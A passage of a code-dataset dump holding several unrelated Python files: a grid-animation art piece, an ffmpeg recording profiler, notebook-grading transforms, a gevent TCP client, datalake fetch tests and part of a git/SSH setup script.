config.paletteDropHueMin\n\t\t\t\tu.dropHueMax = config.paletteDropHueMax\n\n\t\t\tu.createUnitImage()\n\t\t\tif config.coordinatedColorChange == False:\n\t\t\t\tu.setUp()\n\n\t\t\tu.bgColor = tuple(\n\t\t\t\tint(a * config.brightness) for a in (config.colOverlay.currentColor)\n\t\t\t)\n\t\t\tu.drawUnit()\n\t\t\tconfig.image.paste(u.image, (u.xPos + config.imageXOffset, u.yPos), u.image)\n\n\t\t\tconfig.unitArray.append(u)\n\t\t\tunitNumber += 1\n\t\t\tconfig.gridArray[col][row] = u\n\n\n# \"Conway Game of Life Like Redraw\"\n\"Conway Game of Life Like Redraw\"\n\n\ndef redrawGrid1():\n\n\tfor u in config.unitArray:\n\t\tu.bgColor = tuple(\n\t\t\tint(a * config.brightness) for a in (config.colOverlay.currentColor)\n\t\t)\n\t\tu.drawUnit()\n\t\tconfig.image.paste(u.image, (u.xPos + config.imageXOffset, u.yPos), u.image)\n\n\t\tif u.colOverlay.complete == True:\n\t\t\tneighbours = u.getNeighbours()\n\t\t\tu.colOverlay.colorTransitionSetup()\n\t\t\tfor unit in neighbours:\n\t\t\t\tcol = unit[0]\n\t\t\t\trow = unit[1]\n\t\t\t\tif col >= 0 and col < config.cols and row >= 0 and row < config.rows:\n\t\t\t\t\ttargetUnit = config.gridArray[col][row]\n\t\t\t\t\tif random.random() <= config.propagationProbability:\n\t\t\t\t\t\tif (\n\t\t\t\t\t\t\ttargetUnit.colOverlay.getPercentageDone()\n\t\t\t\t\t\t\t> config.doneThreshold\n\t\t\t\t\t\t):\n\t\t\t\t\t\t\ttargetUnit.colOverlay.colorTransitionSetup(\n\t\t\t\t\t\t\t\tnewColor=u.colOverlay.colorB,\n\t\t\t\t\t\t\t\tsteps=round(u.colOverlay.steps / 3),\n\t\t\t\t\t\t\t)\n\n\tconfig.render(config.image, 0, 0)\n\n\ndef redrawGrid2():\n\n\tfor u in config.unitArray:\n\t\tu.bgColor = tuple(\n\t\t\tint(a * config.brightness) for a in (config.colOverlay.currentColor)\n\t\t)\n\t\tu.drawUnit()\n\t\tconfig.image.paste(u.image, (u.xPos + config.imageXOffset, u.yPos), u.image)\n\n\t\tneighbours = 
u.getNeighbours()\n\t\tu.colOverlay.colorTransitionSetup()\n\n\t\tscore = 0\n\n\t\t## Count how many live neighbors there are out of 8 unless at edge (5) or corner (3)\n\t\tfor unit in neighbours:\n\t\t\tcol = unit[0]\n\t\t\trow = unit[1]\n\t\t\tif col >= 0 and col < config.cols and row >= 0 and row < config.rows:\n\t\t\t\ttry:\n\t\t\t\t\ttargetUnit = config.gridArray[col][row]\n\n\t\t\t\t\tif targetUnit.score == 1:\n\t\t\t\t\t\tscore += 1\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e, len(config.unitArray), unit, col, row)\n\n\t\t## If the cell is alive check if it's being overcrowded\n\t\t## or has too few neighbors to survive\n\t\tif u.score == 1:\n\t\t\tif score < config.underPopulationThreshold:\n\t\t\t\tu.score = 0\n\n\t\t\t## Should be > 3\n\t\t\tif score > config.overCrowdingThreshold:\n\t\t\t\tu.score = 0\n\n\t\t\t# if score > 1 and score < config.dieThreshold :\n\t\t\t# u.score = 1\n\n\t\tif u.score == 0:\n\t\t\tif score == config.liveThreshold:\n\t\t\t\tu.score = 1\n\n\t\tif u.score == 1:\n\t\t\tu.colOverlay.colorTransitionSetup(steps=round(u.colOverlay.steps / 3))\n\n\t\tif u.score == 0:\n\t\t\tu.colOverlay.colorTransitionSetup(newColor=(config.deadColor))\n\n\t\tif random.random() > config.propagationProbability:\n\t\t\tu.score = 1\n\n\tconfig.render(config.image, 0, 0)\n\n\tconfig.t2 = time.time()\n\tdelta = config.t2 - config.t1\n\n\tif delta > config.timeToComplete:\n\t\tsetUp()\n\n\n## Setup and run functions\ndef main(run=True):\n\tglobal config, directionOrder\n\tprint(\"---------------------\")\n\tprint(\"propagation Loaded\")\n\n\tcolorutils.brightness = config.brightness\n\tconfig.canvasImageWidth = config.screenWidth\n\tconfig.canvasImageHeight = config.screenHeight\n\tconfig.canvasImageWidth -= 4\n\tconfig.canvasImageHeight -= 4\n\tconfig.delay = float(workConfig.get(\"propagation\", \"redrawDelay\"))\n\n\tconfig.baseRotation = config.rotation\n\n\tconfig.fontColorVals = (workConfig.get(\"propagation\", \"fontColor\")).split(\",\")\n\tconfig.fontColor = tuple(\n\t\tmap(lambda x: int(int(x) * config.brightness), config.fontColorVals)\n\t)\n\tconfig.outlineColorVals = (workConfig.get(\"propagation\", \"outlineColor\")).split(\",\")\n\tconfig.outlineColor = tuple(\n\t\tmap(lambda x: int(int(x) * config.brightness), config.outlineColorVals)\n\t)\n\n\tconfig.coordinatedColorChange = False\n\tconfig.propagationProbability = float(\n\t\tworkConfig.get(\"propagation\", \"propagationProbability\")\n\t)\n\tconfig.doneThreshold = float(workConfig.get(\"propagation\", \"doneThreshold\"))\n\n\tconfig.overCrowdingThreshold = int(\n\t\tworkConfig.get(\"propagation\", \"overCrowdingThreshold\")\n\t)\n\tconfig.underPopulationThreshold = int(\n\t\tworkConfig.get(\"propagation\", \"underPopulationThreshold\")\n\t)\n\tconfig.liveThreshold = int(workConfig.get(\"propagation\", \"liveThreshold\"))\n\t# config.dieThreshold = int(workConfig.get(\"propagation\",\"dieThreshold\"))\n\n\tconfig.timeTrigger = workConfig.getboolean(\"propagation\", \"timeTrigger\")\n\tconfig.tLimitBase = int(workConfig.get(\"propagation\", \"tLimitBase\"))\n\tconfig.colOverlay = coloroverlay.ColorOverlay()\n\tconfig.colOverlay.randomSteps = False\n\tconfig.colOverlay.timeTrigger = False\n\tconfig.colOverlay.tLimitBase = config.tLimitBase\n\tconfig.colOverlay.maxBrightness = config.brightness\n\tconfig.unHideGrid = False\n\tconfig.colorStepsRangeMin = int(workConfig.get(\"propagation\", \"colorStepsRangeMin\"))\n\tconfig.colorStepsRangeMax = int(workConfig.get(\"propagation\", 
\"colorStepsRangeMax\"))\n\n\tconfig.rows = int(workConfig.get(\"propagation\", \"rows\"))\n\tconfig.cols = int(workConfig.get(\"propagation\", \"cols\"))\n\n\tdeadColor = (workConfig.get(\"propagation\", \"deadColor\")).split(\",\")\n\tconfig.deadColor = tuple(map(lambda x: float(x), deadColor))\n\n\ttry:\n\t\tconfig.randomRotation = workConfig.getboolean(\"propagation\", \"randomRotation\")\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.randomRotation = False\n\n\ttry:\n\t\tconfig.showText = workConfig.getboolean(\"propagation\", \"showText\")\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.showText = True\n\n\ttry:\n\t\tconfig.showOutline = workConfig.getboolean(\"propagation\", \"showOutline\")\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.showOutline = True\n\n\ttry:\n\t\tconfig.steps = int(workConfig.get(\"propagation\", \"steps\"))\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.steps = 200\n\n\ttry:\n\t\tconfig.useFixedPalette = workConfig.getboolean(\"propagation\", \"useFixedPalette\")\n\t\tconfig.paletteRange = int(workConfig.get(\"propagation\", \"paletteRange\"))\n\t\tconfig.palette = {}\n\t\tfor i in range(0, config.paletteRange):\n\t\t\tname = \"p\" + str(i + 1)\n\t\t\tvals = (workConfig.get(\"propagation\", name)).split(\",\")\n\t\t\tconfig.palette[name] = tuple(map(lambda x: float(x), vals))\n\t\t# print(config.palette['p1'])\n\t\tconfig.paletteDropHueMin = int(workConfig.get(\"propagation\", \"dropHueMin\"))\n\t\tconfig.paletteDropHueMax = int(workConfig.get(\"propagation\", \"dropHueMax\"))\n\n\texcept Exception as e:\n\t\tprint(str(e))\n\t\tconfig.useFixedPalette = False\n\n\tconfig.colOverlay.steps = config.steps\n\n\tconfig.tileSizeWidth = int(workConfig.get(\"propagation\", \"tileSizeWidth\"))\n\tconfig.tileSizeHeight = int(workConfig.get(\"propagation\", \"tileSizeHeight\"))\n\n\t\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\"\n\n\tconfig.canvasImage = Image.new(\n\t\t\"RGBA\", (config.canvasImageWidth, config.canvasImageHeight)\n\t)\n\tconfig.fontSize = 14\n\tconfig.font = ImageFont.truetype(\n\t\tconfig.path + \"/assets/fonts/freefont/FreeSansBold.ttf\", config.fontSize\n\t)\n\n\tsetUp()\n\n\tif run:\n\t\trunWork()\n\n\ndef setUp():\n\tglobal config\n\n\tmakeGrid()\n\n\ndef runWork():\n\tglobal blocks, config, XOs\n\t# gc.enable()\n\twhile True:\n\t\titerate()\n\t\ttime.sleep(config.delay)\n\n\ndef iterate():\n\n\tglobal config\n\tredrawGrid2()\n\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\n", "sub_path": "pieces/singletons/propagation.py", "file_name": "propagation.py", "file_ext": "py", "file_size_in_byte": 11719, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "PIL.Image.new", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 34, "usage_type": "name"}, {"api_name": "modules.coloroverlay.ColorOverlay", "line_number": 37, "usage_type": "call"}, {"api_name": "modules.coloroverlay", "line_number": 37, "usage_type": "name"}, {"api_name": "time.time", "line_number": 145, "usage_type": "call"}, {"api_name": "time.time", "line_number": 146, "usage_type": "call"}, {"api_name": "random.uniform", 
"line_number": 147, "usage_type": "call"}, {"api_name": "random.random", "line_number": 208, "usage_type": "call"}, {"api_name": "random.random", "line_number": 271, "usage_type": "call"}, {"api_name": "time.time", "line_number": 276, "usage_type": "call"}, {"api_name": "modules.colorutils.brightness", "line_number": 289, "usage_type": "attribute"}, {"api_name": "modules.colorutils", "line_number": 289, "usage_type": "name"}, {"api_name": "modules.coloroverlay.ColorOverlay", "line_number": 324, "usage_type": "call"}, {"api_name": "modules.coloroverlay", "line_number": 324, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 386, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 386, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 390, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 390, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 411, "usage_type": "call"}]}
+{"seq_id": "338142588", "text": "import os\r\nimport time\r\nimport platform\r\nimport subprocess\r\nfrom ..common.recordscreen import video_capture_line\r\nfrom ..common.recordscreen import get_mac_os_display_channel\r\nfrom base import BaseProfiler\r\n\r\n\r\nclass AvconvProfiler(BaseProfiler):\r\n\r\n process = None\r\n fh = None\r\n t1_time = None\r\n\r\n def start_recording(self):\r\n if os.path.exists(self.env.video_output_fp):\r\n os.remove(self.env.video_output_fp)\r\n\r\n if platform.system().lower() == \"windows\":\r\n with open(self.env.recording_log_fp, 'w') as self.fh:\r\n self.process = subprocess.Popen(\"ffmpeg -f gdigrab -draw_mouse 0 -framerate \" + str(self.env.DEFAULT_VIDEO_RECORDING_FPS) + \" -video_size 1024*768 -i desktop -c:v libx264 -r \" + str(self.env.DEFAULT_VIDEO_RECORDING_FPS) + \" -preset veryfast -g 15 -crf 0 \" + self.env.video_output_fp, bufsize=-1, stdout=self.fh, stderr=self.fh)\r\n else:\r\n vline = video_capture_line(self.env.DEFAULT_VIDEO_RECORDING_FPS, self.env.DEFAULT_VIDEO_RECORDING_POS_X,\r\n self.env.DEFAULT_VIDEO_RECORDING_POS_Y,\r\n self.env.DEFAULT_VIDEO_RECORDING_WIDTH, self.env.DEFAULT_VIDEO_RECORDING_HEIGHT,\r\n get_mac_os_display_channel(),\r\n self.env.DEFAULT_VIDEO_RECORDING_CODEC, self.env.video_output_fp)\r\n self.process = subprocess.Popen(vline, bufsize=-1, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\r\n for counter in range(10):\r\n if os.path.exists(self.env.video_output_fp):\r\n self.t1_time = time.time()\r\n break\r\n else:\r\n time.sleep(0.3)\r\n\r\n def stop_recording(self, **kwargs):\r\n if platform.system().lower() == \"windows\":\r\n subprocess.Popen(\"taskkill /IM ffmpeg.exe /T /F\", shell=True) \r\n else:\r\n self.process.send_signal(3)\r\n out, err = self.process.communicate()\r\n with open(self.env.recording_log_fp, 'w') as self.fh:\r\n self.fh.write(err)\r\n self.fh.close()\r\n", "sub_path": "lib/profiler/avconvProfiler.py", "file_name": "avconvProfiler.py", "file_ext": "py", "file_size_in_byte": 2150, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "base.BaseProfiler", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 18, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 20, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 22, "usage_type": "call"}, {"api_name": "common.recordscreen.video_capture_line", "line_number": 24, "usage_type": "call"}, {"api_name": "common.recordscreen.get_mac_os_display_channel", "line_number": 27, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 29, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 39, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "503998134", "text": "\"\"\"Transformations to apply to a submission before execution\"\"\"\n\nimport copy\nimport nbformat\n\n\nIGNORE_CELL_TAG = \"otter_ignore\"\nCELL_METADATA_KEY = \"otter\"\n\n\ndef script_to_notebook(script):\n \"\"\"\n Convert a Python script (a string) to a notebook with ``nbformat``.\n\n Args:\n script (``str``): the script\n\n Returns:\n ``nbformat.NotebookNode``: a notebook with a single code cell containing the script\n \"\"\"\n nb = nbformat.v4.new_notebook()\n nb.cells.append(nbformat.v4.new_code_cell(script))\n return nb\n\n\ndef filter_ignored_cells(nb):\n \"\"\"\n Filter out all cells in the notebook ``nb`` that are tagged with ``otter_ignore`` or have the\n ``ignore`` key of their Otter cell metadata set to true.\n\n Args:\n nb (``nbformat.NotebookNode``): the notebook\n\n Returns:\n ``nbformat.NotebookNode``: the notebook with ignored cells removed\n \"\"\"\n nb = copy.deepcopy(nb)\n\n to_delete = []\n for i, cell in enumerate(nb[\"cells\"]):\n metadata = cell.get(\"metadata\", {})\n tags = metadata.get(\"tags\", [])\n\n if IGNORE_CELL_TAG in tags or metadata.get(CELL_METADATA_KEY, {}).get(\"ignore\", False):\n to_delete.append(i)\n\n to_delete.reverse()\n for i in to_delete:\n del nb[\"cells\"][i]\n\n return nb\n\n\ndef create_collected_check_cell(cell, check_results_list_name, notebook_class_name, test_dir):\n \"\"\"\n Generate a string of calls to ``otter.Notebook.check`` collecting the results in a list called\n ``check_results_list_name`` based on the cell metadata.\n\n Note that this string is formatted with surrounding newlines, so it can be inserted into any\n Python script as-is.\n\n Args:\n cell (``nbformat.NotebookNode``): the code cell to which checks should be appended\n check_results_list_name (``check_results_list_name``): the name of the list to append the \n results to\n notebook_class_name(``str``): the name of the ``otter.Notebook`` class in the environment\n test_dir (``str``): the path to the directory of tests. \n\n Returns:\n ``str``: the code to run the checks; if no checks are indicated, the empty string\n \"\"\"\n source = \"\"\n otter_config = cell.get(\"metadata\", {}).get(CELL_METADATA_KEY, {})\n\n if otter_config.get(\"tests\", []):\n tests = otter_config.get(\"tests\", [])\n for test in tests:\n source += f\"\\n{check_results_list_name}.append({notebook_class_name}(\" + \\\n f\"tests_dir='{test_dir}').check('{test}'))\\n\"\n\n return source\n", "sub_path": "otter/execute/transforms.py", "file_name": "transforms.py", "file_ext": "py", "file_size_in_byte": 2550, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "nbformat.v4.new_notebook", "line_number": 21, "usage_type": "call"}, {"api_name": "nbformat.v4", "line_number": 21, "usage_type": "attribute"}, {"api_name": "nbformat.v4.new_code_cell", "line_number": 22, "usage_type": "call"}, {"api_name": "nbformat.v4", "line_number": 22, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "389572617", "text": "#!/usr/bin/env python\n#coding:utf-8\nimport socket\nfrom gevent import monkey\nmonkey.patch_socket()\nimport gevent\nimport time\n\n\ndef StartClient(port):\n #链接服务端ip和端口\n c_port = ('127.0.0.1', 9999)\n s_port = ('127.0.0.1', port)\n #生成一个句柄\n sk = socket.socket()\n sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sk.bind(c_port)\n #请求连接服务端\n sk.connect(s_port)\n #发送数据\n sk.sendall(bytes('yaoyao', 'utf8'))\n #接受数据\n server_reply = sk.recv(1024)\n #打印接受的数据\n print(\n time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), \" \",\n str(server_reply, 'utf8'))\n\n # port reuse behavior, after socket.close then can reuse the port\n time.sleep(2)\n #关闭连接\n sk.close()\n\n\nif __name__ == '__main__':\n jobs = [gevent.spawn(StartClient(8001 + i)) for i in range(2)]\n gevent.joinall(jobs)\n", "sub_path": "workspace/py_test/tcpClient.py", "file_name": "tcpClient.py", "file_ext": "py", "file_size_in_byte": 932, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "gevent.monkey.patch_socket", "line_number": 5, "usage_type": "call"}, {"api_name": "gevent.monkey", "line_number": 5, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 15, "usage_type": "call"}, {"api_name": "socket.SOL_SOCKET", "line_number": 16, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 16, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 26, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "gevent.spawn", "line_number": 36, "usage_type": "call"}, {"api_name": "gevent.joinall", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "167631389", "text": "# Copyright 2016 Planet Labs, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\nimport pytest\nfrom datalake import InvalidDatalakePath\nimport os\nimport responses\n\n\ndef test_invalid_fetch_url(archive):\n with pytest.raises(InvalidDatalakePath):\n archive.fetch('x4t://foobar/bing')\n\n\ndef test_fetch_url_without_key(archive):\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(archive.storage_url)\n\n\ndef test_key_does_not_exist(archive):\n url = archive.storage_url + '/nosuchfile'\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(url)\n\n\ndef test_fetch(archive, datalake_url_maker, random_metadata):\n content = 'welcome to the jungle'.encode('utf-8')\n url = datalake_url_maker(metadata=random_metadata,\n content=content)\n f = archive.fetch(url)\n assert f.read() == content\n\n\ndef test_fetch_to_file(monkeypatch, archive, datalake_url_maker,\n random_metadata, tmpdir):\n monkeypatch.chdir(str(tmpdir))\n url = datalake_url_maker(metadata=random_metadata,\n content='now with more jingle')\n archive.fetch_to_filename(url)\n assert os.path.exists(random_metadata['id'])\n contents = open(random_metadata['id']).read()\n assert contents == 'now with more jingle'\n\n\ndef test_fetch_to_fancy_template(archive, datalake_url_maker, random_metadata,\n tmpdir):\n url = datalake_url_maker(metadata=random_metadata)\n t = os.path.join(str(tmpdir), '{where}/{what}/{start}-{id}-foobar.log')\n fname = '{}-{}-foobar.log'\n fname = fname.format(random_metadata['start'], random_metadata['id'])\n expected_path = os.path.join(str(tmpdir), random_metadata['where'],\n random_metadata['what'], fname)\n archive.fetch_to_filename(url, filename_template=t)\n assert os.path.exists(expected_path)\n\n\ndef test_no_such_metadata_field_in_template(archive, datalake_url_maker):\n url = datalake_url_maker()\n with pytest.raises(InvalidDatalakePath):\n archive.fetch_to_filename(url, filename_template='{nosuchmeta}')\n\n\ndef test_bad_template(archive, datalake_url_maker):\n url = datalake_url_maker()\n with pytest.raises(InvalidDatalakePath):\n archive.fetch_to_filename(url, filename_template='{bad')\n\n\ndef test_cli_fetch_to_file(monkeypatch, cli_tester, datalake_url_maker,\n random_metadata, tmpdir):\n monkeypatch.chdir(str(tmpdir))\n url = datalake_url_maker(metadata=random_metadata,\n content='look ma, CLI')\n\n cmd = 'fetch ' + url\n output = cli_tester(cmd)\n\n assert output == random_metadata['id'] + '\\n'\n assert os.path.exists(random_metadata['id'])\n contents = open(random_metadata['id']).read()\n assert contents == 'look ma, CLI'\n\n\n@responses.activate\ndef test_fetch_http_url(archive, random_metadata):\n base_url = 'http://datalake.example.com/v0/archive/files/1234/'\n content = 'foobar'.encode('utf-8')\n responses.add(responses.GET, base_url + 'data', body=content,\n content_type='text/plain', status=200)\n responses.add(responses.GET, base_url + 'metadata', json=random_metadata,\n content_type='application/json', status=200)\n f = 
archive.fetch(base_url + 'data')\n assert f.metadata == random_metadata\n assert f.read() == content\n\n\ndef test_invalid_url(archive, random_metadata):\n url = 'http://datalake.example.com/v0/archive/files/1234/'\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(url)\n\n\ndef test_invalid_protocol(archive, random_metadata):\n url = 'ftp://alternate-datalake.example.com/v0/archive/files/1234/data'\n with pytest.raises(InvalidDatalakePath):\n archive.fetch(url)\n\n\n@responses.activate\ndef test_metadata_from_http_url(archive, random_metadata):\n url = 'http://datalake.example.com/v0/archive/files/1234data'\n content = 'foobody'.encode('utf-8')\n responses.add(responses.GET, url + '/data', body=content,\n content_type='text/plain', status=200)\n responses.add(responses.GET, url + '/metadata', json=random_metadata,\n content_type='application/json', status=200)\n f = archive.fetch(url + '/data')\n assert f.read() == content\n assert f.metadata == random_metadata\n", "sub_path": "test/test_fetch.py", "file_name": "test_fetch.py", "file_ext": "py", "file_size_in_byte": 4827, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pytest.raises", "line_number": 21, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 21, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 26, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 26, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 32, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 32, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 69, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 69, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 75, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 75, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "responses.add", "line_number": 98, "usage_type": "call"}, {"api_name": "responses.GET", "line_number": 98, "usage_type": "attribute"}, {"api_name": "responses.add", "line_number": 100, "usage_type": "call"}, {"api_name": "responses.GET", "line_number": 100, "usage_type": "attribute"}, {"api_name": "responses.activate", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 109, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 109, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 115, "usage_type": "call"}, {"api_name": "datalake.InvalidDatalakePath", "line_number": 115, "usage_type": "argument"}, {"api_name": "responses.add", "line_number": 123, "usage_type": "call"}, {"api_name": "responses.GET", 
"line_number": 123, "usage_type": "attribute"}, {"api_name": "responses.add", "line_number": 125, "usage_type": "call"}, {"api_name": "responses.GET", "line_number": 125, "usage_type": "attribute"}, {"api_name": "responses.activate", "line_number": 119, "usage_type": "attribute"}]}
+{"seq_id": "26378140", "text": "from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport getpass\nimport os\nimport shutil\nimport subprocess\nimport sys\n\nfrom Crypto.PublicKey import RSA\nimport publisher.settings as settings\nfrom publisher.exceptions import ValidationError\nfrom publisher.touchsurgery import TouchSurgery\nfrom publisher.utils import WorkingDirectory, get_command_output, get_input, get_platform, \\\n call_command_and_print_exception\n\n\ndef setup_users_machine():\n \"\"\"\n User Setup for publish\n 1. Check if git is installed\n 2. Setup SSH\n 3. Cloning the repo and git pull\n \"\"\"\n if not git_installed():\n win_msg = 'Please install Github for windows from https://desktop.github.com/ before coming back and ' \\\n 'continuing and running setup again.'\n mac_msg = 'Please install Git for Mac from https://git-scm.com/download/mac before running setup again.'\n\n print(\"%s\" % mac_msg if 'darwin' in get_platform() else win_msg)\n sys.exit(1)\n\n print('Generating key and configuring user profile')\n check_and_create_directory(settings.SSH_DIRECTORY_PATH)\n sys.stdout.flush()\n\n login_success = False\n get_username()\n while not login_success:\n if login(get_email(), get_password(), create_rsa_return_pub_key()):\n login_success = True\n\n print(\"Configuring ssh config file \")\n check_and_create_file(settings.SSH_CONFIG_PATH)\n if not has_private_key():\n raise RuntimeError(\"Unable to proceed without a key. Please contact Hansel before trying again\")\n configure_ssh_config()\n\n print(\"Installing and configuring git lfs\")\n check_brew_installed()\n install_git_lfs()\n configure_git_lfs()\n\n check_and_create_directory(settings.GIT_DIRECTORY)\n for repository, checkout_directory in get_repositories_to_checkout():\n clone_repo(repository, checkout_directory)\n pull_repo(checkout_directory)\n\n\ndef get_repositories_to_checkout():\n return [(settings.PROCEDURE_REPOSITORY, settings.PROCEDURE_CHECKOUT_DIRECTORY),\n (settings.CHANNELS_REPOSITORY, settings.CHANNELS_CHECKOUT_DIRECTORY),\n (settings.TRANSLATIONS_REPOSITORY, settings.TRANSLATIONS_CHECKOUT_DIRECTORY)]\n\n\ndef git_installed():\n try:\n subprocess.check_output(['git', '--version'])\n except OSError:\n print(\"Git not installed\")\n return False\n return True\n\n\ndef get_username(all_repos=True):\n print(\"Please enter your name here:\")\n sys.stdout.flush()\n username = get_input()\n if all_repos:\n subprocess.check_output(['git', 'config', '--global', 'user.name', username])\n else:\n subprocess.check_output(['git', 'config', 'user.name', username])\n\n\ndef get_email(all_repos=True):\n print(\"Please enter your touch surgery email here:\")\n sys.stdout.flush()\n email = get_input()\n if all_repos:\n subprocess.check_output(['git', 'config', '--global', 'user.email', email])\n else:\n subprocess.check_output(['git', 'config', 'user.email', email])\n return email\n\n\ndef get_password():\n print(\"Please enter your touch surgery password here:\")\n sys.stdout.flush()\n password = getpass.getpass()\n return password\n\n\ndef has_private_key():\n \"\"\"Check whether the user has the correct private key\n \"\"\"\n return os.path.exists(settings.RSA_PUBLIC_KEY_PATH)\n\n\ndef configure_ssh_config():\n \"\"\"Creates and sets up an ssh config file, or appends the necessary entry to an existing one\n \"\"\"\n shutil.copyfile(os.path.expanduser(settings.SSH_CONFIG_PATH), os.path.expanduser(settings.SSH_CONFIG_PATH + '.bak'))\n\n obsolete_stanza = (\n 'Host {0}\\n '\n 'User 
ubuntu\\n '\n 'IdentitiesOnly true\\n '\n 'IdentityFile ~/.ssh/touchsurgery-studio.pem\\n'\n ).format(settings.STUDIO_GIT_PATH)\n\n ssh_config_stanza = (\n 'Host {0}\\n'\n ' StrictHostKeyChecking no\\n'\n ' User git\\n'\n ' IdentitiesOnly true\\n'\n ' IdentityFile {1}\\n'\n ).format(settings.STUDIO_GIT_PATH, settings.RSA_PRIVATE_KEY_PATH)\n\n try:\n\n with open(os.path.expanduser(settings.SSH_CONFIG_PATH), \"r\") as config_file:\n current_config_text = config_file.read()\n ssh_config_missing = ssh_config_stanza not in current_config_text\n obsolete_stanza_present = obsolete_stanza in current_config_text\n\n # Remove outdated config info\n if obsolete_stanza_present:\n current_config_text = current_config_text.replace(obsolete_stanza, '')\n with open(os.path.expanduser(settings.SSH_CONFIG_PATH), \"w\") as config_file:\n config_file.write(current_config_text)\n\n # Add relevant config info\n if ssh_config_missing:\n with open(os.path.expanduser(settings.SSH_CONFIG_PATH), \"a+\") as config_file:\n config_file.write('\\n' + '\\n' + ssh_config_stanza)\n\n except Exception:\n print(\"Unable to 